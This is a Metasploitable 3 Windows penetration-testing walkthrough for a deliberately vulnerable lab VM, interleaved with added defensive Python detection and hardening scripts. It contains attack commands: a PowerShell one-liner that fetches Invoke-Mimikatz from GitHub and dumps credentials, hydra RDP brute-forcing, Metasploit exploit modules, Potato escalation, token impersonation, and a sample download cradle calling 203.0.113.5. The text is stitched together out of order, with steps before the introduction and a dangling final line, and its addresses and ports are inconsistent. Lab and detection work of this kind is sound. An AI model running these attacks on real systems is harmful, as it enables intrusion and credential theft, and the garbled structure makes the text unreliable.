If you are in a native shell (Evil-WinRM or cmd):
# Download Mimikatz
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
Expected Output: NTLM hashes for Administrator, vagrant, and the machine account. You can now pass-the-hash to any other machine on the fake network.
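From the defender's side, the one-liner above is exactly what PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records. The Python below is an added example, not part of this walkthrough: it runs two small detection rules over constructed script-block text (the sample blocks, including the 203.0.113.5 address, are made up for the example) and flags both the in-memory download cradle and the credential-dumping tool name.

```python
import re
from typing import NamedTuple

# Constructed sample of PowerShell script block text, in the form Event ID 4104
# records when Script Block Logging is enabled. Not real captured data.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\vagrant\\Desktop",
    "iex (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')",
    "Invoke-Mimikatz -DumpCreds",
    "Invoke-WebRequest -Uri https://example.invalid/report.csv -OutFile C:\\temp\\report.csv",
    "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://203.0.113.5/x.ps1')",
]


class Alert(NamedTuple):
    block_index: int
    rule: str
    severity: str
    evidence: str


# Rules: (name, severity, pattern). PowerShell is case-insensitive, so every
# pattern is compiled with re.I. The cradle rule requires both an execution
# primitive (iex / Invoke-Expression) and an in-memory download (DownloadString)
# in the same block, in either order, which is what the one-liner above does.
RULES = [
    ("download_cradle", "high",
     re.compile(r"(?:\biex\b|invoke-expression).*downloadstring\s*\("
                r"|downloadstring\s*\(.*(?:\biex\b|invoke-expression)", re.I | re.S)),
    ("credential_dump_tool", "critical",
     re.compile(r"invoke-mimikatz|-dumpcreds\b", re.I)),
]

SEVERITY_RANK = {"high": 2, "critical": 3}


def scan_script_blocks(blocks):
    """Return one Alert per (block, rule) match, in block order."""
    alerts = []
    for i, text in enumerate(blocks):
        for name, severity, pattern in RULES:
            m = pattern.search(text)
            if m:
                alerts.append(Alert(i, name, severity, m.group(0)[:80]))
    return alerts


def highest_severity(alerts):
    """Worst severity among the alerts, or None when nothing fired."""
    if not alerts:
        return None
    return max(alerts, key=lambda a: SEVERITY_RANK[a.severity]).severity


if __name__ == "__main__":
    found = scan_script_blocks(SAMPLE_SCRIPT_BLOCKS)
    for a in found:
        print(f"block {a.block_index}: {a.rule} [{a.severity}] {a.evidence!r}")
    print("highest severity:", highest_severity(found))
```

Note that the download block fires both rules, because the URL itself names the tool; a benign Invoke-WebRequest that writes to disk fires neither, which is the point of requiring the iex + DownloadString pair rather than alerting on any web client use.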
Now we figure out what is running.
nmap -sV -sC -O -p 80,445,3389,4848,8172,9200 192.168.56.102
Key Insight for Walkthrough: The presence of WinRM (port 47001) and SMB signing disabled will be our eventual keys to the kingdom.
run post/windows/manage/enable_rdp
hydra -l vagrant -P /usr/share/wordlists/rockyou.txt rdp://192.168.1.100
Check SeImpersonatePrivilege etc.
Try Metasploit's getsystem first; it may fail, in which case fall back to the Potato exploits:
msf6 > use exploit/windows/local/ms16_075_reflection_juicy
Or manually upload and run JuicyPotato.exe.
whoami /priv
systeminfo | findstr /B /C:"OS Name" /C:"Hotfix"
Metasploitable 3 is missing hundreds of patches. Use Windows-Exploit-Suggester:
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2024-xx-xx-msf.xls -i systeminfo.txt
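Both `whoami /priv` and `systeminfo` produce fixed-width text that is easy to audit programmatically, whether you are checking a foothold or reviewing a service account during hardening. The Python below is an added example, not from this walkthrough or from Windows-Exploit-Suggester: it parses constructed copies of both outputs, lists the enabled privileges that matter for escalation (the Potato family depends on SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege), and compares installed hotfixes against a required baseline. The KB numbers and the baseline list are placeholders made up for the example.

```python
import re

# Constructed sample of `whoami /priv` output from a service account. Not real captured data.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample of `systeminfo` output, trimmed to the fields parsed below.
# The KB numbers are placeholders, not real hotfix identifiers.
SAMPLE_SYSTEMINFO = """
Host Name:                 METASPLOITABLE3
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB9000001
                           [02]: KB9000002
                           [03]: KB9000003
"""

# Placeholder baseline of hotfixes the build should carry (constructed for the example).
REQUIRED_HOTFIXES = ["KB9000001", "KB9000003", "KB9000004"]

# Privileges that let a compromised account escalate when enabled; the first
# two are what the Potato family needs.
HIGH_IMPACT_PRIVILEGES = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}


def parse_privileges(text):
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with the Se* privilege name and end with the state column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def risky_enabled_privileges(privs):
    """Sorted list of enabled privileges that appear in HIGH_IMPACT_PRIVILEGES."""
    return sorted(p for p, state in privs.items()
                  if state == "Enabled" and p in HIGH_IMPACT_PRIVILEGES)


def parse_systeminfo(text):
    """Return (os_name, [installed KB ids]) from `systeminfo` output."""
    os_name = None
    hotfixes = []
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        m = re.search(r"\[\d+\]:\s*(KB\d+)", line)  # "[01]: KB1234567" rows
        if m:
            hotfixes.append(m.group(1))
    return os_name, hotfixes


def missing_hotfixes(installed, required):
    """Required KBs absent from the installed list, in baseline order."""
    have = set(installed)
    return [kb for kb in required if kb not in have]


if __name__ == "__main__":
    privs = parse_privileges(SAMPLE_WHOAMI_PRIV)
    print("risky enabled privileges:", risky_enabled_privileges(privs))
    os_name, hotfixes = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("OS:", os_name)
    print("missing hotfixes:", missing_hotfixes(hotfixes, REQUIRED_HOTFIXES))
```

The same two parsers work on real output redirected to a file (`whoami /priv > privs.txt`, `systeminfo > systeminfo.txt`), which is also the input Windows-Exploit-Suggester expects for the -i option.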
Metasploitable 3 Windows Walkthrough: A Comprehensive Guide
If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.
This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills.
1. Lab Setup
Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.
Install Prerequisites: You'll need VirtualBox, Vagrant, and the vagrant-vbguest plugin.
Build the VM:
mkdir metasploitable3 && cd metasploitable3
vagrant init rapid7/metasploitable3-win2k8
vagrant up
Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance.
2. Information Gathering
The first step in any engagement is reconnaissance. Let's identify the open ports and services.
Nmap Scan:
nmap -sV -sC -O 192.168.x.x
You will notice a massive attack surface, including:
Port 80/443: IIS 7.5
Port 445: SMB
Port 1433: MSSQL
Port 3306: MySQL
Port 9200: Elasticsearch
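To turn the scan into something you can track and hand to whoever owns the host, save it as XML (`nmap -oX scan.xml ...`) and parse it rather than reading the terminal. The Python below is an added example, not part of the original guide: it reads a constructed nmap XML fragment covering the services listed above and attaches a hardening note to each open port. The address and product strings in the sample are made up for the example (only IIS 7.5 comes from the text), and the notes are general hardening guidance, not findings from the scan.

```python
import xml.etree.ElementTree as ET

# Constructed nmap XML in the shape `nmap -oX` writes, trimmed to the fields used here.
# Address and product strings are made up for the example; IIS 7.5 is from the guide.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="7.5"/></port>
      <port protocol="tcp" portid="135"><state state="filtered"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s" product="Microsoft SQL Server"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL"/></port>
      <port protocol="tcp" portid="9200"><state state="open"/><service name="http" product="Elasticsearch REST API"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Hardening note per port, for the services the guide lists. Anything else is
# flagged for review rather than silently accepted.
HARDENING_NOTES = {
    80: "IIS: patch, remove unused handlers, restrict management paths",
    443: "IIS: patch, remove unused handlers, restrict management paths",
    445: "SMB: require signing, disable SMBv1, restrict to management networks",
    1433: "MSSQL: strong or disabled 'sa', reachable only from application hosts",
    3306: "MySQL: bind to localhost unless remote clients are required, no default accounts",
    9200: "Elasticsearch: keep the REST API off untrusted networks, disable dynamic scripting",
}


def parse_open_ports(xml_text):
    """Return [(host, port, service, product, version)] for ports nmap reported open."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not exposure
            svc = port.find("service")
            results.append((
                addr,
                int(port.get("portid")),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
    return results


def exposure_report(open_ports):
    """Attach a hardening note to each open port; unlisted ports get a review flag."""
    report = []
    for addr, port, service, product, version in open_ports:
        note = HARDENING_NOTES.get(port, "unlisted service: confirm it is required")
        # Prefer the -sV product/version string, fall back to the port's service name.
        label = " ".join(x for x in (product, version) if x) or service
        report.append({"host": addr, "port": port, "service": label, "note": note})
    return report


if __name__ == "__main__":
    for row in exposure_report(parse_open_ports(SAMPLE_NMAP_XML)):
        print(f"{row['host']}:{row['port']:<5} {row['service']:<28} {row['note']}")
```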
3. Exploitation Path A: ElasticSearch (Remote Code Execution)
ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120, which allows arbitrary code execution through its dynamic scripting feature.
Search for the exploit: In Metasploit, use search elasticsearch.
Configure:
use exploit/multi/elasticsearch/script_static_iv_clobber
set RHOSTS [Target IP]
set LHOST [Your IP]
exploit
Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed.
4. Exploitation Path B: ManageEngine Desktop Central
Metasploitable 3 hosts an instance of ManageEngine with an arbitrary file upload vulnerability (CVE-2015-8249).
Search: use exploit/windows/http/manageengine_connectionid_write.
Execute: Set your RHOSTS and RPORT (usually 8020).
Result: This often grants SYSTEM level access immediately, as the service runs with high privileges.
5. Exploitation Path C: Weak Credentials (SMB/MSSQL)
Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.
SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.
MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell.
6. Post-Exploitation & Privilege Escalation
Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM. Local Exploit Suggester:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
7. The Flags
Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.
Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.
By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.
Here’s a structured walkthrough for Metasploitable 3 (Windows target).
This assumes you have the VM set up (built via Packer/Vagrant) and running on a host-only network with Kali Linux as the attacker machine.